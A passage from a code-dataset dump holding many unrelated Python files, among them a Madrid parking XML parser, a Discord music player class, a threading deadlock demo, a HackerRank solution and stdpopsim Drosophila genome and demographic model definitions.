in fileContent.iterrows():\n photo_url = \"https://theunitedstates.io/images/congress/450x550/\" + row.id + \".jpg\"\n fileContent.loc[i,\"photo_url\"] = photo_url\n\n ## save out file \n filePath = serverPath + \"/test_data/\" + fileName\n fileContent.to_csv(filePath, index=False)\n print(\"Adding Photo URL to \" + file)\n\n## pull all files in the 'test_data' dir and execute function\nTargetFolder = serverPath + \"/test_data\"\nfor file in os.listdir(TargetFolder):\n if file != \"user_favorite_reps.csv\":\n AddPhotoURL(file)","sub_path":"go-server/data-utils/test_data_transform.py","file_name":"test_data_transform.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"56481494","text":"from xml.sax.handler import ContentHandler\nfrom xml.sax import make_parser\nfrom urllib.request import urlopen\nimport sys\nimport os.path\nimport string\n\n\ndef normalize_whitespace(texto):\n return str.join(' ',str.split(texto))\n\nclass myContentHandler(ContentHandler):\n\n def __init__ (self):\n #NOMBRE DESCRIPCION ACCESIBILIDAD CONTENT-URL\n #NOMBRE-VIA CLASE-VIAL NUM CODIGO-POSTAL BARRIO DISTRITO LATITUD LONGITUD\n self.inContent = False \n self.theContent = \"\"\n self.atributo = \"\"\n self.nombre = \"\"\n self.descripcion = \"\"\n self.access = \"\"\n self.url = \"\"\n self.nombreVia = \"\"\n self.num = \"\"\n self.codigo = \"\"\n self.barrio = \"\"\n self.distrito = \"\"\n self.latitud = \"\"\n self.longitud = \"\"\n self.email = \"\"\n self.telefono = \"\"\n self.listDic = [] #Lista de diccionarios, uno por cada aparcamiento\n self.dic = {}\n\n\n def startElement (self, name, attrs):\n if name == \"atributo\":\n self.atributo = normalize_whitespace(attrs.get('nombre'))\n if self.atributo in ['NOMBRE','DESCRIPCION','ACCESIBILIDAD','CONTENT-URL','NOMBRE-VIA','NUM','CODIGO-POSTAL','BARRIO','DISTRITO','LATITUD','LONGITUD','TELEFONO','EMAIL']:\n self.inContent = True\n\n def endElement (self, name):\n if self.inContent:\n self.theContent = normalize_whitespace(self.theContent)\n\n if self.atributo == 'NOMBRE':\n self.nombre = self.theContent\n self.dic[self.atributo] = self.nombre\n\n elif self.atributo == 'DESCRIPCION':\n self.descripcion = self.theContent\n self.dic[self.atributo] = self.descripcion\n\n elif self.atributo == 'ACCESIBILIDAD':\n if self.theContent == '1':\n self.access = 'SI'\n else:\n self.access = 'NO'\n\n self.dic[self.atributo] = self.access\n\n elif self.atributo == 'CONTENT-URL':\n self.url = self.theContent\n self.dic[self.atributo] = self.url\n\n elif self.atributo == 'NOMBRE-VIA':\n self.nombreVia = self.theContent\n self.dic[self.atributo] = self.nombreVia\n\n elif self.atributo == 'NUM':\n self.num = self.theContent\n self.dic[self.atributo] = self.num\n\n elif self.atributo == 'CODIGO-POSTAL':\n self.codigo = self.theContent\n self.dic[self.atributo] = self.codigo\n\n elif self.atributo == 'BARRIO':\n self.barrio = self.theContent\n self.dic[self.atributo] = self.barrio\n\n elif self.atributo == 'DISTRITO':\n self.distrito = self.theContent\n self.dic[self.atributo] = self.distrito\n\n elif self.atributo == 'LATITUD':\n self.latitud = self.theContent\n self.dic[self.atributo] = self.latitud\n\n elif self.atributo == 'LONGITUD':\n #self.longitud = self.theContent\n self.dic[self.atributo] = self.theContent\n\n elif self.atributo == 'TELEFONO':\n #self.telefono = self.theContent\n self.dic[self.atributo] = self.theContent\n elif self.atributo == 'EMAIL':\n #self.email = self.theContent\n self.dic[self.atributo] = self.theContent\n \n elif name == 'contenido': \n self.listDic.append(self.dic)\n self.dic = {}\n self.nombre = \"\"\n self.descripcion = \"\"\n self.access = \"\"\n self.url = \"\"\n self.nombreVia = \"\"\n self.num = \"\"\n self.codigo = \"\"\n self.barrio = \"\"\n self.distrito = \"\" \n self.latitud = \"\"\n self.longitud = \"\" \n self.telefono = \"\"\n self.email = \"\"\n self.inContent = False\n self.theContent = \"\"\n\n def characters (self, chars):\n if self.inContent:\n self.theContent = self.theContent + chars\n\n\n def getLista(self):\n return self.listDic\n\n \n# Load parser and driver\n\n\"\"\"\ntheParser = make_parser()\ntheHandler = myContentHandler()\ntheParser.setContentHandler(theHandler)\n\n# Ready, set, go!\n\nxmlFile = urlopen('http://datos.munimadrid.es/portal/site/egob/menuitem.ac61933d6ee3c31cae77ae7784f1a5a0/?vgnextoid=00149033f2201410VgnVCM100000171f5a0aRCRD&format=xml&file=0&filename=202584-0-aparcamientos-residentes&mgmtid=e84276ac109d3410VgnVCM2000000c205a0aRCRD&preview=full')\ntheParser.parse(xmlFile)\n\nlista = theHandler.getLista()\nprint(lista)\nprint (\"Parse complete\")\n\n\"\"\"","sub_path":"practica_final/aparcamientos/xmlParser.py","file_name":"xmlParser.py","file_ext":"py","file_size_in_byte":4598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"385393612","text":"import rospy\nfrom sensor_msgs.msg import JointState\n\ndef callback(data):\n\trospy.loginfo(data)\n\ndef listener():\n\trospy.init_node('JointStateListenerNode')\n\trospy.Subscriber(\"/rx150/joint/commands\", JointState, callback)\n\trospy.spin()\n\trospy.sleep(1)\n\nwhile(True):\n\tlistener()\n\trospy.sleep(1)\n","sub_path":"ROS_Test_2/JointcommandSubscriber.py","file_name":"JointcommandSubscriber.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"145707508","text":"\n\nfrom xai.brain.wordbase.adjectives._flaky import _FLAKY\n\n#calss header\nclass _FLAKIER(_FLAKY, ):\n\tdef __init__(self,): \n\t\t_FLAKY.__init__(self)\n\t\tself.name = \"FLAKIER\"\n\t\tself.specie = 'adjectives'\n\t\tself.basic = \"flaky\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/adjectives/_flakier.py","file_name":"_flakier.py","file_ext":"py","file_size_in_byte":243,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"507022428","text":"# Copyright (C) 2011 Canonical\n#\n# Authors:\n# Michael Vogt\n#\n# This program is free software; you can redistribute it and/or modify it under\n# the terms of the GNU General Public License as published by the Free Software\n# Foundation; version 3.\n#\n# This program is distributed in the hope that it will be useful, but WITHOUT\n# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS\n# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more\n# details.\n#\n# You should have received a copy of the GNU General Public License along with\n# this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\n\nimport os\nimport logging\nfrom softwarecenter.enums import APP_INSTALL_PATH_DELIMITER\n\nLOG = logging.getLogger(__name__)\n\n\nclass GMenuSearcher(object):\n\n def __init__(self):\n self._found = None\n\n def _search_gmenu_dir(self, dirlist, needle):\n if not dirlist[-1]:\n return\n from gi.repository import GMenu\n dir_iter = dirlist[-1].iter()\n current_type = dir_iter.next()\n while current_type is not GMenu.TreeItemType.INVALID:\n if current_type == GMenu.TreeItemType.DIRECTORY:\n self._search_gmenu_dir(\n dirlist + [dir_iter.get_directory()], needle)\n elif current_type == GMenu.TreeItemType.ENTRY:\n item = dir_iter.get_entry()\n desktop_file_path = item.get_desktop_file_path()\n # direct match of the desktop file name and the installed\n # desktop file name\n if os.path.basename(desktop_file_path) == needle:\n self._found = dirlist + [item]\n return\n # if there is no direct match, take the part of the path after\n # \"applications\" (e.g. kde4/amarok.desktop) and\n # change \"/\" to \"__\" and do the match again - this is what\n # the data extractor is doing\n if \"applications/\" in desktop_file_path:\n path_after_applications = desktop_file_path.split(\n \"applications/\")[1]\n if needle == path_after_applications.replace(\"/\",\n APP_INSTALL_PATH_DELIMITER):\n self._found = dirlist + [item]\n return\n current_type = dir_iter.next()\n\n def get_main_menu_path(self, desktop_file, menu_files_list=None):\n if not desktop_file:\n return\n from gi.repository import GMenu\n from gi.repository import GObject\n # use the system ones by default, but allow override for\n # easier testing\n if menu_files_list is None:\n menu_files_list = [\"applications.menu\", \"settings.menu\"]\n for n in menu_files_list:\n if n.startswith(\"/\"):\n tree = GMenu.Tree.new_for_path(n, 0)\n else:\n tree = GMenu.Tree.new(n, 0)\n try:\n tree.load_sync()\n except GObject.GError as e:\n LOG.warning(\"could not load GMenu path: %s\" % e)\n return\n\n root = tree.get_root_directory()\n self._search_gmenu_dir([root],\n os.path.basename(desktop_file))\n if self._found:\n return self._found\n\n\n# these are the old static bindinds that are no longer required\n# (this is just kept here in case of problems with the dynamic\n# GIR and the old gtk2 gtk ui)\nclass GMenuSearcherGtk2(object):\n\n def __init__(self):\n self._found = None\n\n def _search_gmenu_dir(self, dirlist, needle):\n if not dirlist[-1]:\n return\n\n import gmenu\n for item in dirlist[-1].get_contents():\n mtype = item.get_type()\n if mtype == gmenu.TYPE_DIRECTORY:\n self._search_gmenu_dir(dirlist + [item], needle)\n elif item.get_type() == gmenu.TYPE_ENTRY:\n desktop_file_path = item.get_desktop_file_path()\n # direct match of the desktop file name and the installed\n # desktop file name\n if os.path.basename(desktop_file_path) == needle:\n self._found = dirlist + [item]\n return\n # if there is no direct match, take the part of the path after\n # \"applications\" (e.g. kde4/amarok.desktop) and\n # change \"/\" to \"__\" and do the match again - this is what\n # the data extractor is doing\n if \"applications/\" in desktop_file_path:\n path_after_applications = desktop_file_path.split(\n \"applications/\")[1]\n if needle == path_after_applications.replace(\"/\",\n APP_INSTALL_PATH_DELIMITER):\n self._found = dirlist + [item]\n return\n\n def get_main_menu_path(self, desktop_file, menu_files_list=None):\n if not desktop_file:\n return\n import gmenu\n # use the system ones by default, but allow override for\n # easier testing\n if menu_files_list is None:\n menu_files_list = [\"applications.menu\", \"settings.menu\"]\n for n in menu_files_list:\n tree = gmenu.lookup_tree(n)\n self._search_gmenu_dir([tree.get_root_directory()],\n os.path.basename(desktop_file))\n if self._found:\n return self._found\n","sub_path":"mp4/SD_card/partition1/usr/share/software-center/softwarecenter/ui/gtk3/gmenusearch.py","file_name":"gmenusearch.py","file_ext":"py","file_size_in_byte":5618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"519756655","text":"import logging\nimport time\nimport json\n\nfrom discord.ext import commands\n\nfrom .filters import Filter\n\nlogger = logging.getLogger(__name__)\n\n\nclass Player:\n def __init__(self, bot: commands.bot, guild_id: int, node):\n self.bot = bot\n self.guild_id = guild_id\n self.node = node\n\n self.last_update = None\n self.last_position = None\n self.last_state = None\n self.position_timestamp = None\n\n self._voice_state = {}\n\n self.volume = 100\n self.paused = False\n self.current = None\n self.channel_id = None\n\n @property\n def is_connected(self):\n return self.channel_id is not None\n\n async def update_state(self, state: dict):\n state = state[\"state\"]\n\n self.last_state = state\n self.last_update = time.time() * 1000\n self.last_position = state.get(\"position\", 0)\n self.position_timestamp = state.get(\"time\", 0)\n\n async def _voice_server_update(self, data):\n self._voice_state.update({\"event\": data})\n await self._dispatch_voice_update()\n\n async def _voice_state_update(self, data):\n self._voice_state.update({\"sessionId\": data[\"session_id\"]})\n\n\n if data['channel_id'] is None:\n self.channel_id = None\n else:\n self.channel_id = int(data[\"channel_id\"])\n\n if not self.channel_id:\n self._voice_state.clear()\n return logger.debug(\"PLAYER | Player-update with no channel_id, Clearing state\")\n\n await self._dispatch_voice_update()\n\n async def _dispatch_voice_update(self):\n if {\"sessionId\", \"event\"} == self._voice_state.keys():\n logger.debug(f\"PLAYER | Updating voice-state\")\n await self.node._websocket._send(\n op=\"voice-server-update\",\n guildId=str(self.guild_id),\n **self._voice_state,\n )\n\n async def connect(self, channel_id: int):\n \"\"\"\n Connects to a VoiceChannel,\n Params:\n - channel_id integer\n \"\"\"\n guild = self.bot.get_guild(self.guild_id)\n if not guild:\n raise ValueError(f\"Invalid guild id {self.guild_id}\")\n\n self.channel_id = channel_id\n\n ws = self.bot._connection._get_websocket(guild.id)\n await ws.voice_state(self.guild_id, str(channel_id))\n\n logger.info(f\"PLAYER | Connected to voice channel: {channel_id}\")\n\n async def disconnect(self):\n \"\"\"\n Figure out why it was being big dumb\n \"\"\"\n ws = self.bot._connection._get_websocket(self.guild_id)\n await ws.voice_state(self.guild_id, None)\n\n async def set_filters(self, filter_type):\n if not issubclass(filter_type.__class__, Filter):\n raise TypeError(\"All filters must derive from `Filter`\")\n\n await self.node._websocket._send(op=\"filter\", guildId = str(self.guild_id), **filter_type._payload)\n\n async def play(self, track):\n self.last_update = 0\n self.last_position = 0\n self.position_timestamp = 0\n self.paused = False\n\n self.current = track\n\n await self.node._websocket._send(\n op=\"play\", guildId=str(self.guild_id), track=track.id\n )\n logger.debug(f\"PLAYER | Now playing {track.title} in {self.channel_id}\")\n\n async def set_pause(self, pause):\n if pause is self.paused:\n return\n\n self.paused = pause\n\n await self.node._websocket._send(\n op=\"pause\", pause=pause, guildId=str(self.guild_id)\n )\n\n async def seek(self, position):\n if not 0 < position < self.current.length:\n raise ValueError(\n \"Position cannot be smaller than 0 or larger than track's length\"\n )\n\n await self.node._websocket._send(\n op=\"seek\", position=position, guildId=str(self.guild_id)\n )\n\n async def set_volume(self, volume):\n await self.node._websocket._send(\n op=\"volume\", volume=volume, guildId=str(self.guild_id)\n )\n\n async def stop(self):\n await self.node._websocket._send(op=\"stop\", guildId=str(self.guild_id))\n\n\n async def get_tracks(self, query: str):\n return await self.node.get_tracks(query)\n\n async def destroy(self):\n await self.stop()\n await self.disconnect()\n\n\n await self.node._websocket._send(op=\"destroy\", guildId=str(self.guild_id))\n del self.node.players[self.guild_id]","sub_path":"andesite/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"388356171","text":"# -*- coding: utf-8 -*-\n\"\"\"\n__title__ = '09 死锁与递归锁.py'\n__author__ = 'yangyang'\n__mtime__ = '2018.02.08'\n\"\"\"\n\n# 死锁: 是指两个或两个以上的进程或线程在执行过程中,因争夺资源而造成的一种互相等待的现象,若无外力作用,它们都将无法推进下去。此时称系统处于死锁状态或系统产生了死锁,这些永远在互相等待的进程称为死锁进程,如下就是死锁\n\n# 造成下面的原因是,两个线程在对方身上都有需要的锁,因此 造成了死锁。\nfrom threading import Thread,Lock\nimport time\nmutexA=Lock()\nmutexB=Lock()\n\nclass MyThread(Thread):\n def run(self):\n self.func1()\n self.func2()\n def func1(self):\n mutexA.acquire()\n print('\\033[41m%s 拿到A锁\\033[0m' %self.name)\n\n mutexB.acquire()\n print('\\033[42m%s 拿到B锁\\033[0m' %self.name)\n mutexB.release()\n\n mutexA.release()\n\n def func2(self):\n mutexB.acquire()\n print('\\033[43m%s 拿到B锁\\033[0m' %self.name)\n time.sleep(2)\n\n mutexA.acquire()\n print('\\033[44m%s 拿到A锁\\033[0m' %self.name)\n mutexA.release()\n\n mutexB.release()\n\nif __name__ == '__main__':\n for i in range(10):\n t=MyThread()\n t.start()\n\n# 递归锁:可以连续acquire多次,每次acquire一次计数器+1,当release一次计数器-1,因此,只要递归锁的计数不为0,就不能被其他线程抢到。\n#\n# from threading import Thread,RLock\n# import time\n# mutexA=RLock() # 创建递归锁对象\n# print(\"mutexA\",mutexA)\n#\n#\n# class MyThread(Thread):\n# def run(self):\n# self.func1()\n# self.func2()\n# def func1(self):\n# mutexA.acquire()\n# print('\\033[41m%s 拿到A锁\\033[0m' %self.name)\n# mutexA.acquire()\n# print('\\033[42m%s 拿到B锁\\033[0m' %self.name)\n# mutexA.release()\n# mutexA.release()\n#\n# def func2(self):\n# mutexA.acquire()\n# print('\\033[43m%s 拿到B锁\\033[0m' %self.name)\n# time.sleep(2)\n#\n# mutexA.acquire()\n# print('\\033[44m%s 拿到A锁\\033[0m' %self.name)\n# mutexA.release()\n# mutexA.release()\n#\n# if __name__ == '__main__':\n# for i in range(10):\n# t=MyThread()\n# t.start()\n\n\n\n\n\n\n\n\n\n","sub_path":"fourth_module/多线程多进程/new/多线程/09 死锁与递归锁.py","file_name":"09 死锁与递归锁.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"97446569","text":"import pandas as pd\n\nfrom ..describe import describe, Description\nfrom ..io import readCsv\n\n@describe(\n Description('Append columns', 'the columns of two data tables using a matching key.', dockerImage='kitware/pysciencedock')\n .input('table1', 'The first data table', type='file', deserialize=readCsv)\n .input('table2', 'The second data table', type='file', deserialize=readCsv)\n .output('combined', 'The combined table', type='new-file', serialize=lambda df, fileName: df.to_csv(fileName))\n)\ndef append_columns(table1, table2):\n first_join_column = ['hour','day','year','date','time']\n second_join_column = first_join_column \n result_df = pd.merge(table1, table2, how='outer', left_on=first_join_column, right_on=second_join_column)\n return result_df \n","sub_path":"pysciencedock/transform/append_columns.py","file_name":"append_columns.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"398133664","text":"class Solution:\n def longestCommonSubsequence(self, t1: str, t2: str) -> int:\n if not t1 or not t2: return 0\n m, n= len(t1), len(t2)\n \n dp= [[0]*(n+1) for _ in range(2)]\n \n for i in range(1, m+1):\n for j in range(1, n+1):\n if t1[i-1]==t2[j-1]:\n dp[i%2][j]= dp[(i-1)%2][j-1]+1\n else:\n dp[i%2][j]= max(dp[(i-1)%2][j], dp[i%2][j-1])\n \n \n return dp[m%2][n]\n \n","sub_path":"lc_1143_Longest_Common_Subsequence.py","file_name":"lc_1143_Longest_Common_Subsequence.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"477012251","text":"# import random\n\n\ndef guess_game(): \n tempNum = 30\n count_tries = 1\n inputNum = int(input(\"Give me a number from 1 to 100: \"))\n while inputNum != tempNum:\n if count_tries == 4:\n break\n elif inputNum > tempNum:\n print(\"too high!\")\n else:\n print(\"too low!\")\n inputNum = int(input(\"Please insert a new number: \"))\n count_tries += 1\n if inputNum == tempNum:\n print(\"just right!\")\n else:\n print(\"Sorry, try again from scratch!\")\n print(\"End of the game! \")\n\n\nexample = guess_game()\n","sub_path":"Python_Workout_Ex_1.py","file_name":"Python_Workout_Ex_1.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"411427159","text":"import unittest\nfrom collections import namedtuple\n\nfrom yahtzee.util import rgetattr\n\nclass TestVector(unittest.TestCase):\n\n def test_recursive_hasattrs(self):\n obj = namedtuple('TopLevel', 'a')(\n namedtuple('MidLevel', 'b')(\n namedtuple('BottomLevel', 'c')(3)\n )\n )\n\n self.assertEqual(rgetattr(obj, 'a'), obj.a)\n self.assertEqual(rgetattr(obj, 'a', 'b'), obj.a.b)\n self.assertEqual(rgetattr(obj, 'a', 'b', 'c'), 3)\n\n self.assertRaises(AttributeError, rgetattr, obj, 'a', 'nope')\n self.assertRaises(AttributeError, rgetattr, obj, 'a', 'b', 'c', 'd')\n self.assertIs(rgetattr(obj, 'a', 'b', 'c', 'd', default=obj.a), obj.a)\n\n self.assertIs(rgetattr(obj, 'nope', default=obj.a), obj.a)\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_util.py","file_name":"test_util.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"200802767","text":"import logging\nfrom Utils import load_games\nfrom pprint import pprint\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport csv\n\ncsv_output = []\nheadings = ['season', 'league', 'team', 'w', 'l', 'd', 'pts', 'AMV', 'AMS', 'AMST', 'position']\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.DEBUG)\n\n league = \"E0\"\n for season in range(2000, 2015):\n for league in [\"E0\", \"E1\"]:\n results = {}\n for game in load_games(season, league):\n\n away_mv = game[\"FTAG\"] - game[\"FTHG\"]\n away_ms = game[\"AS\"] - game['HS']\n away_mst = game[\"AST\"] - game['HST']\n home_mv = game[\"FTHG\"] - game[\"FTAG\"]\n home_ms = game[\"HS\"] - game['AS']\n home_mst = game[\"HST\"] - game['AST']\n\n if game[\"HomeTeam\"] not in results:\n results[game[\"HomeTeam\"]] = {\n \"MV\": [],\n \"MS\": [],\n \"MST\": [],\n \"W\": 0,\n \"L\": 0,\n \"D\": 0,\n }\n\n if game[\"AwayTeam\"] not in results:\n results[game[\"AwayTeam\"]] = {\n \"MV\": [],\n \"MS\": [],\n \"MST\": [],\n \"W\": 0,\n \"L\": 0,\n \"D\": 0,\n }\n\n if game['FTR'] == 'H':\n results[game[\"HomeTeam\"]]['W'] += 1\n results[game[\"AwayTeam\"]]['L'] += 1\n elif game['FTR'] == 'A':\n results[game[\"HomeTeam\"]]['L'] += 1\n results[game[\"AwayTeam\"]]['W'] += 1\n elif game['FTR'] == 'D':\n results[game[\"HomeTeam\"]]['D'] += 1\n results[game[\"AwayTeam\"]]['D'] += 1\n else:\n logging.critical(\"Result was an unknown value %s\" % game['FTR'])\n\n results[game[\"AwayTeam\"]]['MV'].append(away_mv)\n results[game[\"HomeTeam\"]]['MV'].append(home_mv)\n\n results[game[\"AwayTeam\"]]['MS'].append(away_ms)\n results[game[\"HomeTeam\"]]['MS'].append(away_mst)\n\n results[game[\"AwayTeam\"]]['MST'].append(away_ms)\n results[game[\"HomeTeam\"]]['MST'].append(away_mst)\n\n AMVs = []\n AMSs = []\n AMSTs = []\n points = []\n\n for team in sorted(results.keys()):\n AMVs.append(np.average(results[team]['MV']))\n AMSs.append(np.average(results[team]['MS']))\n AMSTs.append(np.average(results[team]['MST']))\n points.append(results[team]['W'] * 3 + results[team]['D'])\n\n array = np.array(points)\n temp = array.argsort()[::-1]\n positions = np.arange(len(array))[temp.argsort()]\n positions = positions + 1\n\n for ii in range(len(results.keys())):\n team = sorted(results.keys())[ii]\n csv_output.append({\n 'season': season,\n 'league': league,\n 'team': team,\n 'w': results[team]['W'],\n 'l': results[team]['L'],\n 'd': results[team]['D'],\n 'pts': points[ii],\n 'position': positions[ii],\n 'AMV': AMVs[ii],\n 'AMS': AMSs[ii],\n 'AMST': AMSTs[ii]\n })\n\n plt.figure()\n plt.subplot(2, 2, 1)\n plt.title(\"%s - %s\" % (season, league))\n plt.plot(AMVs, points, 'o')\n plt.xlabel(\"AMV\")\n plt.ylabel(\"Points\")\n plt.subplot(2, 2, 2)\n plt.title(\"%s - %s\" % (season, league))\n plt.plot(AMSs, points, 'o')\n plt.xlabel(\"AMS\")\n plt.ylabel(\"Points\")\n plt.subplot(2, 2, 3)\n plt.title(\"%s - %s\" % (season, league))\n plt.plot(AMSTs, points, 'o')\n plt.xlabel(\"AMST\")\n plt.ylabel(\"Points\")\n plt.subplot(2, 2, 4)\n plt.title(\"%s - %s\" % (season, league))\n plt.plot(AMVs, positions, 'o')\n plt.xlabel(\"AMV\")\n plt.ylabel(\"Position\")\n\nwith open(\"ranks.csv\", 'w') as fid:\n writer = csv.DictWriter(fid, headings)\n writer.writeheader()\n writer.writerows(csv_output)\npprint(csv_output)\nplt.show()\n","sub_path":"MeasureRankQuality.py","file_name":"MeasureRankQuality.py","file_ext":"py","file_size_in_byte":4543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"330788617","text":"#!/bin/python3\n\"\"\"\nAlice and Bob each created one problem for HackerRank. A reviewer rates the two challenges, awarding points on a scale from to for three categories: problem clarity, originality, and difficulty.\n\nWe define the rating for Alice's challenge to be the triplet , and the rating for Bob's challenge to be the triplet .\n\nYour task is to find their comparison points by comparing with , with , and with .\n\nIf , then Alice is awarded point.\nIf , then Bob is awarded point.\nIf , then neither person receives a point.\nComparison points is the total points a person earned.\n\nGiven and , can you compare the two challenges and print their respective comparison points?\n\nInput Format\n\nThe first line contains space-separated integers, , , and , describing the respective values in triplet . \nThe second line contains space-separated integers, , , and , describing the respective values in triplet .\n\nConstraints\n\nOutput Format\n\nPrint two space-separated integers denoting the respective comparison points earned by Alice and Bob.\n\nSample Input\n\n5 6 7\n3 6 10\nSample Output\n\n1 1\n\"\"\" \n\nimport os\nimport sys\n\n#\n# Complete the solve function below.\n#\ndef solve(a0, a1, a2, b0, b1, b2):\n #\n # Write your code here.\n #\n alice =0\n bob=0\n\n if (a0>b0):\n print(\"Alice scores more\")\n alice = alice+1\n elif (b0 > a0):\n print(\"Bob score more\")\n bob = bob + 1\n\n if (a1>b1):\n print(\"Alice scores more\")\n alice = alice+1\n elif (b1 > a1):\n print(\"Bob score more\")\n bob = bob + 1\n \n if (a2>b2):\n print(\"Alice scores more\")\n alice = alice+1\n elif(b2 > a2):\n print(\"Bob score more\")\n bob = bob + 1\n\n result = (alice, bob)\n\n return result\n \n\nif __name__ == '__main__':\n #f = open(os.environ['OUTPUT_PATH'], 'w')\n\n a0A1A2 = input().split()\n\n a0 = int(a0A1A2[0])\n\n a1 = int(a0A1A2[1])\n\n a2 = int(a0A1A2[2])\n\n b0B1B2 = input().split()\n\n b0 = int(b0B1B2[0])\n\n b1 = int(b0B1B2[1])\n\n b2 = int(b0B1B2[2])\n\n result = solve(a0, a1, a2, b0, b1, b2)\n print(result)\n\n #f.write(' '.join(map(str, result)))\n #f.write('\\n')\n\n #f.close()\n","sub_path":"Algorithms/alicebob.py","file_name":"alicebob.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"167017873","text":"with open('../../CSV/评论分词/word_vec_new1.txt', 'w',encoding='utf-8') as f:\n with open('../../CSV/评论分词/word_vec_new.txt', 'r',encoding='utf-8') as fp:\n\n flag=0\n for line in fp:\n for i in line:\n if i==',':\n flag=1\n break\n\n if flag==0:\n line = str(line).replace(\"\\n\", \"\")\n f.write(line)\n else:\n line = str(line).replace(\"\\n\", \"\")\n f.write('\\n'+line)\n\n flag=0\n\n","sub_path":"NetEaseCloudMusicCrawler_TEST/ANALYSOR/pycode/测试2.py","file_name":"测试2.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"289857558","text":"\"\"\"\nGenome, genetic map and demographic model definitions for humans.\n\"\"\"\n\nimport msprime\n\nimport stdpopsim.models as models\nimport stdpopsim.genomes as genomes\nimport stdpopsim.genetic_maps as genetic_maps\n\n\n###########################################################\n#\n# Genetic maps\n#\n###########################################################\n\n\nclass Comeron2012_dm6(genetic_maps.GeneticMap):\n \"\"\"\n Comeron et al. (2012) maps (lifted over to dm6) used in\n Currently needs a readme as to the lift over, etc.\n \"\"\"\n url = (\n \"http://sesame.uoregon.edu/~adkern/dmel_recombination_map/\"\n \"comeron2012_maps.tar.gz\")\n file_pattern = \"genetic_map_comeron2012_dm6_{name}.txt\"\n\n\ngenetic_maps.register_genetic_map(Comeron2012_dm6())\n\n###########################################################\n#\n# Genome definition\n#\n###########################################################\n\n# List of chromosomes. Data for length information based on DM6,\n# https://www.ncbi.nlm.nih.gov/genome/?term=drosophila+melanogaster.\n# FIXME: add mean mutation and recombination rate data to this table.\n_chromosome_data = \"\"\"\\\nchrX 23542271\nchr2L 23513712\nchr2R 25286936\nchr3L 28110227\nchr3R 32079331\nchr4 1348131\nchrY 3667352\nchrM 19524\n\"\"\"\n\n_chromosomes = []\nfor line in _chromosome_data.splitlines():\n name, length = line.split()[:2]\n _chromosomes.append(genomes.Chromosome(\n name=name, length=int(length),\n default_mutation_rate=8.4e-9, # WRONG!, underestimate used in S&S\n default_recombination_rate=8.4e-9)) # WRONG, underestimate used in S&S!\n\n\n#: :class:`stdpopsim.Genome` definition for D. melanogaster. Chromosome length data is\n#: based on `dm6 `_.\ngenome = genomes.Genome(\n species=\"drosophila_melanogaster\",\n chromosomes=_chromosomes,\n default_genetic_map=Comeron2012_dm6.name)\n\n\n###########################################################\n#\n# Demographic models\n#\n###########################################################\n\ndefault_generation_time = 0.1\n\n\nclass SheehanSongThreeEpoch(models.Model):\n \"\"\"\n Model Name:\n SheehanSongThreeEpoch\n\n Model Description:\n The three epoch (modern, bottleneck, ancestral) model estimated for a\n single African Drosophila Melanogaster population from `Sheehan and Song `_ . Population sizes are estimated by a\n deep learning model trained on simulation data. NOTE: Due to differences in\n coalescence units between PSMC (2N) and msms (4N) the number of generations were\n doubled from PSMC estimates when simulating data from msms in the original\n publication. We have faithfully represented the published model here.\n\n Model population indexes:\n - African D. melanogaster: 0\n\n Parameter Table:\n .. csv-table::\n :widths: 15 8 20\n :header: \"Parameter Type (units)\", \"Value\", \"Description\"\n :file: ../docs/parameter_tables/drosophila_melanogaster/SheehanSongThreeEpoch_params.csv\n\n CLI help:\n python -m stdpopsim drosophila-melanogaster SheehanSongThreeEpoch -h\n\n Citation:\n Sheehan, S. & Song, Y. S. Deep Learning for Population Genetic Inference. PLOS\n Computational Biology 12, e1004845 (2016).\n\n \"\"\" # noqa: E501\n\n author = \"Sheehan et al.\"\n year = 2016\n doi = \"https://doi.org/10.1371/journal.pcbi.1004845\"\n\n def __init__(self):\n # Parameter values from \"Simulating Data\" section\n # these are assumptions, not estimates\n N_ref = 100000\n t_1_coal = 0.5\n t_2_coal = 5.0\n # estimates from the ANN\n N_R = 544200\n N_B = 145300\n N_A = 652700\n # Times are provided in 4N_ref generations, so we convert into generations.\n # generation_time = 10 / year\n t_1 = t_1_coal * 4 * N_ref\n t_2 = (t_1_coal + t_2_coal) * 4 * N_ref\n self.generation_time = default_generation_time\n\n # Population metadata\n metadata_afr = {\n \"name\": 